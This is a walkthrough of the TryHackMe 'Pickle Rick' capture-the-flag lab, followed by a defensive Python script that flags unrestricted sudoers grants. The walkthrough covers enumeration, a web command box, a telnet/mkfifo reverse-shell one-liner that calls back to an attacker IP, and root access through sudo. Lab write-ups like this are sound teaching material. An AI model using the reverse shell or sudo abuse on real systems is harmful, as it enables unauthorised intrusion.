TryHackMe: Pickle Rick CTF
A fun machine that focuses on enumeration and investigation, reverse shells, and the Linux file system.
Enumeration
After starting the machine, I ran a few different processes to gain a basic understanding of the machine and services.
dirb:
/assets/
nmap:
port 22: OpenSSH
port 80: Apache on Ubuntu
Apache/2.4.18 (Ubuntu) Server at 10.10.139.155 Port 80
Source Code Analysis:
Note to self, remember username!
Username: R1ckRul3s
The text references "BURP" twice - possibly a hint that Burp Suite will be useful.
Running gobuster with file extensions revealed a login page:
gobuster -u http://ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html -t 15
/login.php
Known Information
- Username: R1ckRul3s
- Login page at /login.php
- A string from robots.txt (potential password)
Authentication was successful using the username and string from robots.txt!
Foothold
The login granted access to a command execution box. First commands:
id
ls -lah
We have a webshell running as the www-data user (uid 33). Interesting files discovered:
- Sup3rS3cretPickl3Ingred.txt
- clue.txt
The cat command was disabled, but strings worked:
strings clue.txt
# "Look around the file system for the other ingredient."
strings Sup3rS3cretPickl3Ingred.txt
# First flag obtained!
Exploitation
To make further progress, a more useful reverse shell was needed. After trying various methods, telnet worked:
TF=$(mktemp -u);mkfifo $TF && telnet 10.13.5.104 4443 0<$TF | /bin/bash 1>$TF
Navigating to /home revealed the second ingredient:
cd /home
cd rick
ls # second ingredients
cat * # Second flag obtained!
Privilege Escalation
Running preliminary privesc commands:
find . -perm /4000
sudo -l
Interestingly, sudo -l returned "ALL" - this user can run any command as root!
sudo ls /root/ # Shows 3rd.txt
sudo vi /root/3rd.txt # Third flag obtained!
The machine was complete with all three ingredients found.
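The privilege escalation above worked because the web server account could run any command as root through sudo. The following is an added example, not part of the original write-up: a small audit that flags unrestricted sudoers grants, with service accounts rated critical. The account list, the function name audit_sudoers and the sample sudoers text are assumptions constructed for illustration.

```python
import re

# Assumed list of accounts that run network-facing services; adjust per host.
SERVICE_ACCOUNTS = {"www-data", "nginx", "apache", "mysql", "postgres", "nobody"}
# Rule shape: user host = (runas) [TAG:] cmd, cmd
RULE = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias",
        "#include", "@include")

SAMPLE = """\
# Constructed sudoers sample, not taken from the target machine
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
"""

def audit_sudoers(text):
    """Return one finding per non-root principal allowed to run ALL as root."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(SKIP):
            continue
        if line.startswith("#") and not re.match(r"#\d+\s", line):
            continue  # comment; "#33 ..." would be a rule for uid 33
        m = RULE.match(line)
        if not m:
            continue
        who, _host, runas, cmds = m.groups()
        runas_user = (runas or "root").split(":")[0]  # no runas list means root
        as_root = bool(re.search(r"\b(ALL|root)\b", runas_user))
        # Drop tags such as NOPASSWD: before splitting the command list.
        commands = [c.strip() for c in re.sub(r"\b[A-Z_]+:\s*", "", cmds).split(",")]
        if who == "root" or not as_root or "ALL" not in commands:
            continue
        findings.append({
            "line": lineno,
            "who": who,
            "nopasswd": "NOPASSWD:" in cmds,
            "severity": "critical" if who in SERVICE_ACCOUNTS else "review",
        })
    return findings

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE):
        print(finding)
```

On a real host, feed it the contents of /etc/sudoers and each file under /etc/sudoers.d, read as root.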